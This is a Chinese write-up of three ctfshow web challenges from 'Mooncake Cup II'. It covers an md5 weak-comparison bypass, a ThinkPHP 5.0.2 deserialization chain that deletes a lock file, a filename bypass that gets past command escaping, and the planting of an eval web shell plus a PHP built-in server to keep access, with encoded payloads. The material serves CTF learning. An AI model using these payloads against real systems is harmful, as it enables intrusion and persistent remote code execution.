ctfshow web 月饼杯II

web签到

<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {echo "小伙子不错嘛！！flag给你了：" . $flag;} else {echo "偶吼，带黑阔被窝抓到了！！！！";}
}

弱比较

我本来是想直接数组绕过的结果不行
YBB[]=1
那就只能用这个了
0e215962017这个的md5值也是0e开头所以可以绕过

eztp

<?php
namespace app\index\controller;
class Index
{   public function index($run=[]){highlight_file(__FILE__);echo '<h1>Welcome to CTFSHOW</h1></br>';echo 'Powered by PHPthink5.0.2</br>';echo dirname(__FILE__);if (!empty($run[2])){echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';}if (!empty($run[1])){unserialize($run[1]);}}// hint:/index/index/backdoorpublic function backdoor(){if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){echo "Try to post CMD arguments".'<br/>';$data = input('post.');if (!preg_match('/flag/i',$data['cmd'])){$cmd = escapeshellarg($data['cmd']);  //对cmd进行转义$cmd='cat '.$cmd;echo $cmd;system($cmd);}else{echo "No No No";}}else{echo dirname(__FILE__).'/../../'."install.lock has not been deleted";}}
}
Welcome to CTFSHOWPowered by PHPthink5.0.2
/var/www/html/application/index/controller

还有一个base64解码看看
思路我们先必须删除'/../../'."install.lock"然后才能进行绕过
版本为5.0.2我们可以利用5.1的文件删除漏洞

<?php
namespace think\process\pipes;
use think\Process;
class Pipes{} 
class Windows extends Pipes{private $files=[];function __construct(){$this -> files=["/var/www/html/application/index/controller/../../install.lock"];}
}
echo urlencode(serialize(new Windows()));
?>

会反序列化run[1],然后我们就可以进行反序列化然后进行传参

index.php/index/index?run[1]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F..%2F..%2Finstall.lock%22%3B%7D%7D

然后访问index.php/index/index/backdoor进行POST传参
但是前面提到了会进行转义，这里是使用了一个%99,解码是个中文可以绕过

cmd=/fl%99ag

不要离开我

<?php// 题目说明：
// 想办法维持权限，确定无误后提交check，通过check后，才会生成flag，此前flag不存在error_reporting(0);
highlight_file(__FILE__);$a=$_GET['action'];switch($a){case 'cmd':eval($_POST['cmd']);break;case 'check':file_get_contents("http://checker/api/check");break;default:die('params not validate');
}

这道题命令执行很简单，但是没有生成flag，我们要先生成flag才可以

php内置服务器

cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>");
没有编码发现没有反应编码之后成功发送   这个\是为了避免shell被转义
cmd=%66%69%6c%65%5f%70%75%74%5f%63%6f%6e%74%65%6e%74%73%28%22%2f%74%6d%70%2f%69%6e%64%65%78%2e%70%68%70%22%2c%22%3c%3f%70%68%70%20%65%76%61%6c%28%5c%24%5f%50%4f%53%54%5b%27%61%27%5d%29%3b%3f%3e%22%29%3b

看看有没有设置成功

cmd=system('cat /tmp/index.php');

cmd=system("sleep 10 && php -S 0.0.0.0:80 -t /tmp/");cmd=%73%79%73%74%65%6d%28%22%73%6c%65%65%70%20%31%30%20%26%26%20%70%68%70%20%2d%53%20%30%2e%30%2e%30%2e%30%3a%38%30%20%2d%74%20%2f%74%6d%70%2f%22%29%3b%0a然后我们要在10秒之内把?action=check 执行了，check会关闭nginx和php-fpm，由于是www-data权限，⽆法启动nginx和php-fpm，直接启动php内置服务器即可。

check之后光速退出，就可以看到这个页面
我愿意称为MVP结算页面